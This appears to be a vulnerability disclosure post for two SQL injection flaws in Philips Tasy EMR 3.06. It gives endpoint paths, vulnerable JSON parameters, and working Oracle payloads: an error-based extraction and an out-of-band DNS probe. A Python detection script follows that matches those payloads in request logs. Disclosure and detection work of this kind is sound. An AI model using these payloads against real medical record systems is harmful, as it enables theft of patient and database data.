PHILIPS – TASY EMR 3.06 – SQL INJECTION (CVE-2021-39375, CVE-2021-39376)

This post describes two SQL injection vulnerabilities in the Philips Tasy Electronic Medical Record (EMR), version 3.06.


CVE-2021-39375 – getDimensionItemsByCode


During authenticated testing, the attacker identified that the “filterValue” parameter of hostname/TasyAppServer/resources/service/WAdvancedFilter/getDimensionItemsByCode is vulnerable to SQL injection.
The flaw was discovered through the system's advanced filter functionality: when a malicious character is submitted, the response returns an error message containing a stack trace.

URL: hostname/TasyAppServer/resources/service/WAdvancedFilter/getDimensionItemsByCode
Vulnerable Parameter: filterValue
Request Method: POST
Request Type: JSON
Payload Example: a%' AND (SELECT CTXSYS.DRITHSX.SN(user,(SELECT DISTINCT owner FROM all_tables OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)) FROM dual) like '%a


[Screenshot: Sending the malicious payload]
[Screenshot: Extracting data]

CVE-2021-39376 – executaConsultaEspecifico


During authenticated analysis, the attacker identified that the IE_CORPO_ASSIST and CD_USUARIO_CONVENIO parameters of a POST request to https://hostname/TasyAppServer/resources/service/CorCad_F2/executaConsultaEspecifico were not properly sanitized.

URL: hostname/TasyAppServer/resources/service/CorCad_F2/executaConsultaEspecifico
Request Method: POST
Request Type: JSON
Payload Example: NOT 0' AND (SELECT UTL_INADDR.get_host_address('') from dual) like '%a


[Screenshot: Sending the malicious OOB payload inside the IE_CORPO_ASSIST parameter]
[Screenshot: Receiving the DNS lookup in the Burp Collaborator client]
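A defensive check built from both advisories above, added here as an example and not the vendor's or the author's code: it scans JSON request bodies for the Oracle primitives the published payloads rely on (CTXSYS.DRITHSX.SN, UTL_INADDR) and the quote breakout before them, and marks hits on the parameters named in this post. The endpoint paths, parameter names and payloads come from the post; the access-log style path, the assumption that bodies are JSON, and the sample requests are constructed.

```python
import json
import re

# Endpoints and JSON parameters named in the advisory (path as the application server logs it).
FILTER_PATH = "/TasyAppServer/resources/service/WAdvancedFilter/getDimensionItemsByCode"
CONSULTA_PATH = "/TasyAppServer/resources/service/CorCad_F2/executaConsultaEspecifico"
ADVISORY_PARAMS = {FILTER_PATH: {"filterValue"}, CONSULTA_PATH: {"IE_CORPO_ASSIST", "CD_USUARIO_CONVENIO"}}
# Oracle primitives in the published payloads (CTXSYS.DRITHSX.SN error-based, UTL_INADDR out-of-band
# DNS) and the quote breakout that precedes both; case-insensitive and tolerant of inserted whitespace.
SIGNATURES = {
    "oracle-error-based": re.compile(r"CTXSYS\s*\.\s*DRITHSX\s*\.\s*SN\s*\(", re.I),
    "oracle-oob-dns": re.compile(r"UTL_INADDR\s*\.\s*GET_HOST_ADDRESS\s*\(", re.I),
    "quote-breakout": re.compile(r"'\s*(AND|OR|UNION)\b", re.I),
}

def _string_fields(obj, prefix=""):
    """Yield (dotted_name, value) for every string in a parsed JSON body, however deeply nested."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from _string_fields(val, f"{prefix}{key}.")
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from _string_fields(val, f"{prefix}{i}.")
    elif isinstance(obj, str):
        yield prefix.rstrip("."), obj

def inspect_request(path, body):
    """One finding per (parameter, rule) hit; advisory_param marks the parameters the advisory names."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        parsed = {"<raw-body>": body}  # malformed JSON is still inspected as plain text
    watched = ADVISORY_PARAMS.get(path.split("?", 1)[0], set())
    findings = []
    for name, value in _string_fields(parsed):
        for rule, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.append({"param": name, "rule": rule, "advisory_param": name in watched})
    return findings

# Constructed sample requests: a benign filter, then the two payloads quoted in the advisory.
SAMPLES = [
    (FILTER_PATH, json.dumps({"filterValue": "ibuprofen"})),
    (FILTER_PATH, json.dumps({"filterValue": "a%' AND (SELECT CTXSYS.DRITHSX.SN(user,(SELECT DISTINCT "
                              "owner FROM all_tables OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)) FROM dual) like '%a"})),
    (CONSULTA_PATH, json.dumps({"IE_CORPO_ASSIST": "NOT 0' AND (SELECT UTL_INADDR.get_host_address('') "
                                "from dual) like '%a", "CD_USUARIO_CONVENIO": "123"})),
]

if __name__ == "__main__":
    for path, body in SAMPLES: print(path.rsplit("/", 1)[-1], inspect_request(path, body))
```

The signatures are a triage heuristic for request logs or a WAF stage, not a fix: the vendor-side remedy remains parameterized queries for these parameters.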